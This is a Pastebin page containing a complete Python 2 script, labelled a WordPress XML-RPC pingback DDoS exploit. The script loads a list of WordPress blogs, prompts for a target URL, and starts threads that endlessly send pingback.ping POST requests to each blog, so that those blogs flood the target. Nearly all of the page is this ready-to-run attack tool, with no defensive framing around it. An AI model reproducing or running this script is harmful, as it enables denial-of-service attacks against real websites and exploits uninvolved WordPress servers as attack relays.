Advertisement
TP2K1

XMLRPC DDoS WordPress PingBack API Remote Exploit

Jul 23rd, 2015
1,656
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.38 KB | None | 0 0
  1. #!/usr/bin/python
  2. import sys
  3. import socket
  4. import threading
  5. import time
  6. import os
  7. Lock = threading.Lock()
  8. def main():
  9. try:
  10. in_file = open("list.txt","r")
  11. except:
  12. raw_input('You need a list.txt file to work')
  13. sys.exit(0)
  14. os.system("title ...:: XMLRPC PingBack DDoS ::... ")
  15. print '-------------------------------------------------------------------------\n'
  16. print '\tXML-RPC PingBack API Remote DDoS'
  17. print '\tDate : 20/04/2014'
  18. print '\tTested on Windows 7 / Windows Server 2012 / FreeBSD 9.2'
  19. print '\tPython version coded by : Sikh887 \n'
  20. print '--------------------------------------------------------------------------\n\n '
  21. num_thread = input("Number of thread: ")
  22. url = raw_input("Target: ")
  23. for i in range(num_thread):
  24. try:
  25. in_line = in_file.readline()
  26. Thread1(url, i+1, in_line).start()
  27. in_line = in_line[:-1]
  28. except:
  29. pass
  30. time.sleep(3)
  31.  
  32.  
  33. class Thread1(threading.Thread):
  34. def __init__(self, url, number, blog):
  35. self.url = url
  36. self.number = number
  37. self.blog = blog
  38. threading.Thread.__init__(self)
  39.  
  40. def run(self):
  41. Lock.acquire()
  42. print 'Starting thread #%s'%self.number
  43. Lock.release()
  44. function_pingback = "<?xml version='1.0' encoding='iso-8859-1'?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>"%(self.url, self.blog)
  45. request_lenght = len(function_pingback)
  46. try:
  47. self.blog_cleaned = self.blog.split("?p=")[0]
  48. self.blog_cleaned1 = self.blog_cleaned.split("http://")[1].split("/")[0]
  49. except:
  50. sys.exit(0)
  51. request = "POST %s/xmlrpc.php HTTP/1.0\r\nHost: %s\r\nUser-Agent: Internal Wordpress RPC connection\r\nContent-Type: text/xml\r\nContent-Length: %s\r\n\n<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>\r\n\r\n"%(self.blog_cleaned, self.blog_cleaned1, request_lenght, self.url, self.blog)
  52. while True:
  53. time.sleep(3)
  54. try:
  55. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.SOL_TCP)
  56. s.connect((self.blog_cleaned1, 80))
  57. s.send(request)
  58. print"Thread %s | Blog %s"%(self.number, self.blog_cleaned1)
  59. except:
  60. ok = 0
  61. main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement